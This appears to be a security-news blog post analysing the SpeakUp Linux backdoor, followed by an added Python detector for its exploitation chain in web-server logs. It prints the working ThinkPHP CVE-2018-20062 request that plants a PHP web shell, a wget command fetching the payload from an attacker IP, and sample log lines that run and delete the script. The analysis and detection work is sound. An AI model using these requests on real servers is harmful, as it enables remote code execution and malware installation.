Hello and welcome to Dark Street Hackers. First of all, thank you all for your huge support. Today I am here with the latest news about malware. Let's see what it is.


Recently, researchers found a Trojan that installs a backdoor on six different Linux distributions. Its name is SpeakUp.
          

It targets Linux servers directly, including hosts running on AWS, and macOS devices as well.
       
 
The infection starts by exploiting a ThinkPHP vulnerability. That vulnerability was disclosed in December 2018 and affected more than 45,000 websites; although the developers released a patch, it was still being actively exploited on servers that had not yet applied it. The exploit uploads a PHP shell, which in turn launches a Perl backdoor script. Once the backdoor is running, the Perl script deletes the files used during the infection so that no evidence of it is left behind. The first stage of the backdoor itself is to register the victim's machine with the C&C so it can receive the next-stage payload. According to Check Point Research, the attackers encoded both the backdoor and its C&C communication with salted base64 to avoid detection.


Once the device is registered, the Trojan contacts the C&C for commands. The C&C can respond in several ways: "newtask", which downloads and executes a file from a remote server; "notask", which puts the Trojan to sleep for three seconds; and "newerconfig", which updates the miner configuration file. SpeakUp also spreads by scanning for other vulnerable Linux servers: it brute-forces passwords on admin panels, checks whether specific ports are open, and exploits known RCE (Remote Command Execution) vulnerabilities.


SpeakUp communicates with its C&C over HTTP using POST and GET requests. The C&C is a compromised website, speakupomaha[.]com.


In the first step, the Trojan sends a POST request containing a victim ID and information such as the current version of the installed script. The first C&C response is "needrgr", which means the victim is new to the server and needs to register.


The Trojan then posts "full information" about the machine, gathered by running the following Linux commands:

1) uname (-r, -v, -m, -n, -a, -s)
2) whoami
3) ifconfig -a
4) arp -a
5) cat /proc/cpuinfo | grep -c "cpu family"
6) who -b


The exploitation process is as follows.

1) A GET request exploiting the RCE (Remote Command Execution) vulnerability in ThinkPHP (CVE-2018-20062) is sent to the targeted server. The command it runs writes a minimal PHP shell into index.php that executes whatever is passed in the "module" parameter:

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['module'];system($action);?^>>index.php


2) A second HTTP request is sent to the targeted server. It goes through the new shell's "module" parameter and downloads the payload into /tmp:

/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc


3) A further HTTP request executes the downloaded Perl script, sleeps for three seconds and then deletes the file to remove the evidence.
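The three requests above leave a recognisable trail in the web server's access log, so a practitioner would want a detector for the whole chain rather than just the initial exploit. The following is an added example, not code from the original post or from Check Point. It assumes an Apache/nginx "combined" log format; the log lines are constructed for the demo (the third request is reconstructed from the description above, not a captured request, and the client addresses are RFC 5737 documentation ranges). The `module=` patterns are specific to the web shell dropped in step 1; a shell that used a different parameter name would need its own pattern.

```python
"""
Detect the SpeakUp ThinkPHP exploitation chain in web-server access logs.

Added example, not code from the original post or from Check Point. It
assumes the Apache/nginx "combined" log format; the sample log below is
constructed for the demo and is not a real capture.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Stage 1: CVE-2018-20062, the ThinkPHP 5.x invokefunction RCE. The exploit
# signature is invokefunction + call_user_func_array with a command-execution
# function in vars[0], exactly as in the request shown in the post.
STAGE1_RE = re.compile(
    r'invokefunction.*function=call_user_func_array.*'
    r'vars\[0\]=(system|exec|shell_exec|passthru)',
    re.I,
)
# Stage 2: the dropped shell runs whatever is in the "module" parameter;
# SpeakUp used it to fetch the "ibus" payload into /tmp.
STAGE2_RE = re.compile(r'[?&]module=(wget|curl)\s', re.I)
# Stage 3: the same parameter runs the downloaded Perl script and removes it.
STAGE3_RE = re.compile(r'[?&]module=perl\s.*rm\s+-rf', re.I)

STAGES = ((1, STAGE1_RE), (2, STAGE2_RE), (3, STAGE3_RE))


def parse_line(line):
    """Parse one combined-format log line; return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Percent-decode (and '+' -> space) so encoded variants still match below.
    rec['decoded'] = unquote_plus(rec['path'])
    return rec


def classify(decoded_path):
    """Return the stage of the SpeakUp chain this request matches, or 0."""
    for stage, rx in STAGES:
        if rx.search(decoded_path):
            return stage
    return 0


def scan(log_text):
    """Group hits by source IP and report which stages each IP reached."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stage = classify(rec['decoded'])
        if stage:
            hits[rec['ip']].add(stage)
    return {ip: sorted(stages) for ip, stages in hits.items()}


def likely_compromised(report):
    """IPs that went beyond the initial exploit: the web shell was actually used."""
    return sorted(ip for ip, stages in report.items() if 2 in stages or 3 in stages)


# Constructed sample log (not a real capture). Attacker IPs are TEST-NET ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Feb/2019:03:12:01 +0000] "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%5E%3C%3Fphp%20%24action%20%3D%20%24_GET%5B%27module%27%5D%3Bsystem(%24action)%3B%3F%5E%3E%3Eindex.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Feb/2019:03:12:02 +0000] "GET /?module=wget%20hxxp://67[.]209.177.163/ibus%20-O%20/tmp/e3ac24a0bcddfacd010a6c10f4a814bc HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Feb/2019:03:12:03 +0000] "GET /?module=perl%20/tmp/e3ac24a0bcddfacd010a6c10f4a814bc;sleep%203;rm%20-rf%20/tmp/e3ac24a0bcddfacd010a6c10f4a814bc HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Feb/2019:03:15:44 +0000] "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 500 0 "-" "python-requests/2.21"
192.0.2.5 - - [14/Feb/2019:03:16:10 +0000] "GET /index.php?s=/index/user/login HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    report = scan(SAMPLE_LOG)
    for ip, stages in report.items():
        print(ip, "reached stages", stages)
    print("likely compromised:", likely_compromised(report))
```

On the sample, 203.0.113.7 reaches all three stages and is reported as likely compromised, while 198.51.100.9 only fired the exploit (and got a 500), so it is a scanner hit worth patching for but not proof of a shell. Decoding before matching matters: the exploit URL is usually sent percent-encoded, and matching the raw path would miss it.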


           
When the exploitation succeeds, the ibus script is deployed on the target server. Check Point also linked the campaign to a user on HackForums called Zettabit, who may be the author behind it.


So this is it! Stay tuned for more updates. Until then, bye.
